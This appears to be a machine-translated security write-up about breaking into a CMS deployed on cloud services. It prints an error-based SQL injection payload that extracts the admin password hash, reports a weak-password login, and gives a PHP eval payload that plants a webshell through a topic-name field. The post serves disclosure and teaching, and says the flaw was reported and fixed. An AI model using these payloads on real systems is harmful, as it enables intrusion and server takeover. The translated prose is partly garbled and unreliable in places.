And friends chatted about a topic, affect server deployment architecture upgrade security. From the simplest one server to applications, databases, file servers separated; the room from a local server to the cloud server product matrix; from virtualization deployments to containers, has been changed to a safer direction.
This paper attempts to build such a scenario, the source code on the ECS, database put RDS, unstructured data storage put HDFS. Getshell conventional means, such as SQL injection to write the file, any file upload, file included and so no longer seems so. This situation, how to break the deployment architecture of the system, to get webshell site it?
Actual idea: penetration black box white box test code audit +
The information collected during the time, find the site management background, see the login screen page source code, learn the system may be developed by a secondary CMS. Open Source CMS further download the source code code audit, sql injection from the foreground to the background getshell.
CMS demo site exploits a process:
1, the use of foreground SQL injection vulnerability, the search of the fill Pyload:
keyword=1%' or (select 1 from (select count(),concat((concat(0x5e5e21,(select concat(0x7c,password,0x7c) from xxxxx_user where uid=1),0x215e5e)),floor(rand(0)2))x from information_schema.tables group by x)a)#
The md5 value: 21232f297a57a5a743894a0e4a801fc3 decrypt admin
Use weak password admin / admin successfully landed the background.
2, landing the background, set at Home - the topic Management - Create Thematic - the name of the topic to fill Payload: test111 ', eval ($ _ POST [g]), //
3, access webshell address:
PS: Case cited herein, security vulnerabilities in 2018.11 submit official, it has been repaired.
Upgrade the technology infrastructure, it can reduce the number of security risks to a large extent, the black box penetration will no doubt increase the difficulty of the exploit. At present, the popular micro-service architecture, there will be more and more systems usage scenarios, and this is a big challenge, you think you got the permission of the whole system, in fact, you may be hit in a system service.
I liked the words, short instructive: the details of a vulnerability is discovered, the architecture to solve the problem, process control risk.